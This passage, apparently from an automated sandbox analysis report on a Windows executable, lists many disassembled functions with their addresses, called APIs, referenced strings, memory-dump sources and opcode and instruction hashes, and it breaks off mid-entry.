Instruction ID: a296680f873d5749fbddd9458267512cc696b1811ceba66c0286af223c4269a4
Opcode Fuzzy Hash: 5c4d4fe03b1a64b22552a404e94a1d53109b584db142505ca916920d0297fc4f
Instruction Fuzzy Hash: 6341E932305A4086EF969F27E5807E973B5EB58BD8F181027FB0E47AA5DF38C8919740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001953E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147timeCOMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32 ref: 00000001400196A3
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140019767

Strings

ErrorLevel, xrefs: 0000000140019729

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Time$CurrentDirectoryFileSystem
String ID: ErrorLevel
API String ID: 2903961910-220487136
Opcode ID: bf3e7281bc98a524b65ee43159819780f9900e4e02ce1937708de8e8c2e3beb3
Instruction ID: d799a42fd44c0b52998f00863b3f2f248d3bceb675abef24c70b76c30874e4f9
Opcode Fuzzy Hash: bf3e7281bc98a524b65ee43159819780f9900e4e02ce1937708de8e8c2e3beb3
Instruction Fuzzy Hash: 35615872214B4082EB529F27E9547DA33A4FB89FD8F481126EF894BBA9DF39C450C750

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B25A4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001400B25E7

Strings

gfff, xrefs: 00000001400B2712
e+000, xrefs: 00000001400B268F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: eee5713d3ee3f5d484f8c11630cc5d48c8f9b302c68aad1caa58d75069734cbc
Instruction ID: 61c85c2c6a388eb6eb24f925c43f97f738af9f37ca4f5b0d4790cce32985ed39
Opcode Fuzzy Hash: eee5713d3ee3f5d484f8c11630cc5d48c8f9b302c68aad1caa58d75069734cbc
Instruction Fuzzy Hash: 21511976714BC086E7268F7699413D97BA1E395BD0F489225EB9447BEACB3CC445C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002F41E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 000000014002F438

Strings

Out of memory., xrefs: 000000014002F456, 000000014002F4C6
A, xrefs: 000000014002F5CB

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: A$Out of memory.
API String ID: 0-1278255009
Opcode ID: 79de0ec0ff0cfd64c15ce81a5147b610f61afac8aba6a8cb64f1e34740dda396
Instruction ID: 467dde4ddc3624f21e9693dd3dd692a826cd3876b3a1352550a69bceaf88c27b
Opcode Fuzzy Hash: 79de0ec0ff0cfd64c15ce81a5147b610f61afac8aba6a8cb64f1e34740dda396
Instruction Fuzzy Hash: E0511732205B4085EB66DF26E8503E973A5FB4CBD8F44412AEB8D47B74EF78C6918740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005450C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: f1cba43113dfb8cb662bf1ade5c382bf9984ffa852038bffa325dd96ef33e444
Instruction ID: cecf33901bc5c3ac2b05b01cba4b1f47f5371c2d3e66ff0240e3e897add4e906
Opcode Fuzzy Hash: f1cba43113dfb8cb662bf1ade5c382bf9984ffa852038bffa325dd96ef33e444
Instruction Fuzzy Hash: 5431A036615A9082EB62CF12F0107DA77A0F78D7E8F544212FB5903BE9EB79C986C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 15b9bd6b379569076b28376e50680520561e4ba9db9d61f7f2a9b5df354b8ace
Instruction ID: 5cf4a493a0d421caa1bf01c45cc12b75b0351c9195f5b1dc52c4a7769694847d
Opcode Fuzzy Hash: 15b9bd6b379569076b28376e50680520561e4ba9db9d61f7f2a9b5df354b8ace
Instruction Fuzzy Hash: 01319F36619A8086DB62CB12F0543DA77A0F78D7E8F544212FB5943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140061160, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 0000000140061197
SHFileOperationW.SHELL32 ref: 000000014006121D

Strings

\, xrefs: 00000001400611C1

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FileFullNameOperationPath
String ID: \
API String ID: 1380555793-2967466578
Opcode ID: e8bfbb057c76f10d7de97065186224da9732f09d4cb21bb8287e9045b5429000
Instruction ID: 3a65edeb419c4bfcf5a098fdd129620f60c82b9336cb9b1133669d397fc21ded
Opcode Fuzzy Hash: e8bfbb057c76f10d7de97065186224da9732f09d4cb21bb8287e9045b5429000
Instruction Fuzzy Hash: B931AF7291578086EB529B65E4503DA63B1EB997A0F585316F7AC43BF4EB7CC188CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140050680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32 ref: 000000014005071A
FileTimeToSystemTime.KERNEL32 ref: 000000014005072D

Strings

%04d%02d%02d%02d%02d%02d, xrefs: 0000000140050767

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Time$File$LocalSystem
String ID: %04d%02d%02d%02d%02d%02d
API String ID: 1748579591-4847443
Opcode ID: 5843e3882d1dcab57b6af56ecaa70eac69cf320e508c9690187eb711318d3b60
Instruction ID: 823b30e1757d1e32911a9709a266117f92b60f5366063b9bfb122c7045a96119
Opcode Fuzzy Hash: 5843e3882d1dcab57b6af56ecaa70eac69cf320e508c9690187eb711318d3b60
Instruction Fuzzy Hash: D8316D7361869586E765CF16E0503AEB7B1F388BE0F144216EBAA43AE8DB39C550DB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007C6F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 000000014007C7B5
InsertMenuItemW.USER32 ref: 000000014007C7CC

Strings

P, xrefs: 000000014007C731

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInsert
String ID: P
API String ID: 3891021626-3110715001
Opcode ID: 42ccc81ab47dda8e90b4e0dbdc95a82c3cf01d8a6a9546156e60b59b82302db0
Instruction ID: 95c0ca7d048a15d5604144ae0ac4d03f7f2615036de139d27f9f6b0237f27d4e
Opcode Fuzzy Hash: 42ccc81ab47dda8e90b4e0dbdc95a82c3cf01d8a6a9546156e60b59b82302db0
Instruction Fuzzy Hash: B0214B76718B4086E765CF16E440B5A77A0F78CBD4F144265EFAD83B64DB38C991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B003, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B0C7
GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

Strings

MZ@, xrefs: 000000014001B136
Up, xrefs: 000000014001AFC4, 000000014001B140

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout$CharUpper_invalid_parameter_noinfo
String ID: Up$MZ@
API String ID: 991500651-2530889181
Opcode ID: 697b1ddf391089b84ab6e29162d92631a95ca3f16c5f7ede29f4cba60a95f2f1
Instruction ID: 0f0724e6aa44e10c27b577b4b3187c41486d87ce5aec6bf742ebd7696531e053
Opcode Fuzzy Hash: 697b1ddf391089b84ab6e29162d92631a95ca3f16c5f7ede29f4cba60a95f2f1
Instruction Fuzzy Hash: 2321A1326086918AF7269B26A4147FE3BB0F70E7D8F098111FB95877E5DB3AC181C751

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: de48dedb2d8f64697cf96937d6efe2c2a0ea9c1dc5e32183bc192979a8df80c2
Instruction ID: 382487860e0010923ce80037c4cfabb39c287060218e3f9e4300a95374c8fd35
Opcode Fuzzy Hash: de48dedb2d8f64697cf96937d6efe2c2a0ea9c1dc5e32183bc192979a8df80c2
Instruction Fuzzy Hash: 51218032615A9082EB62CF12F0547DA77A0F78D7E8F544212FB6943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544FD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 09098bda75351ba7dba76ee1c92df32a132018686c4c09a2cd074ed0c52e59ed
Instruction ID: b0cbe2999384d7fcca08c60d9691201fc42142856bf261effc23cabb44b8de1f
Opcode Fuzzy Hash: 09098bda75351ba7dba76ee1c92df32a132018686c4c09a2cd074ed0c52e59ed
Instruction Fuzzy Hash: CB21A032615A9082EB62CF12F0007DA77A0F78C7E8F544212FB6943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005452C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: ddc1193f9d68e82286e7111d3aa5933917d60497afe9eb3252a7273c93d758cb
Instruction ID: ac248a79933f7ed667a01fc0cc5b6e2c4e91191defc3f090282e21e2918ee102
Opcode Fuzzy Hash: ddc1193f9d68e82286e7111d3aa5933917d60497afe9eb3252a7273c93d758cb
Instruction Fuzzy Hash: 59318D36615A9082EB62CF12E0047DA77A0F74C7E8F544212FB9943BA9EB79C985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140064130, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

VariantChangeType.OLEAUT32 ref: 0000000140064403

Strings

MZ@, xrefs: 0000000140064152

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ChangeTypeVariant
String ID: MZ@
API String ID: 4220676616-2978689999
Opcode ID: 30e0cf0a4c9115540636613ea16c2a44b881968d220bd31c04d0a0c5dbb11a6f
Instruction ID: 92b591d3be54bcd71e1f4f04b012b2babcae1167d48a11ea441402cbf69973ae
Opcode Fuzzy Hash: 30e0cf0a4c9115540636613ea16c2a44b881968d220bd31c04d0a0c5dbb11a6f
Instruction Fuzzy Hash: 3A217F73214B1082E3158F16F4507AE77A1FB88BD8F459125FB8D47BA4EB38C590CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544C6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 669f7922971e2a12abed5b82d35e66300251db2a6a5d77d1bcfd8d27a54f3054
Instruction ID: e0a9c1a3259e22d9f8201f47920329e5032e5cbd342937295e9f0b490f4b063e
Opcode Fuzzy Hash: 669f7922971e2a12abed5b82d35e66300251db2a6a5d77d1bcfd8d27a54f3054
Instruction Fuzzy Hash: 47219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC986CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544C1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: a64697e608e75743c963295409f36fdf663f82038318541f736e3f0b01c85712
Instruction ID: 93557342ca6019b1540806aef76abb851e53d0ef65082074a5b7e4bea75239c7
Opcode Fuzzy Hash: a64697e608e75743c963295409f36fdf663f82038318541f736e3f0b01c85712
Instruction Fuzzy Hash: 32219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 9d4dce7bd1c8d4e80a28012051c248a3de5bb6e3b3aa01ebcace92755085cd9e
Instruction ID: 60cb311df3463d4b6b60edab0157bdc3386718566dbf2fc0e06a9e816dc89372
Opcode Fuzzy Hash: 9d4dce7bd1c8d4e80a28012051c248a3de5bb6e3b3aa01ebcace92755085cd9e
Instruction Fuzzy Hash: D5218032615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544CB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3988221542-2351679343
Opcode ID: 072c944db6f3e8afa0c68e46e89b7200b26af6b8689e4ec210f4422cb6713a74
Instruction ID: 95ad26671e152d5bdfff73a9f5d69eb270b56f542cf63d7f44d78f43d5b4835e
Opcode Fuzzy Hash: 072c944db6f3e8afa0c68e46e89b7200b26af6b8689e4ec210f4422cb6713a74
Instruction Fuzzy Hash: DD219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB9943BA9DB7DC985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400544D5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL ref: 0000000140054637
RtlLeaveCriticalSection.NTDLL ref: 00000001400546F0

Strings

0, xrefs: 00000001400545C5
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
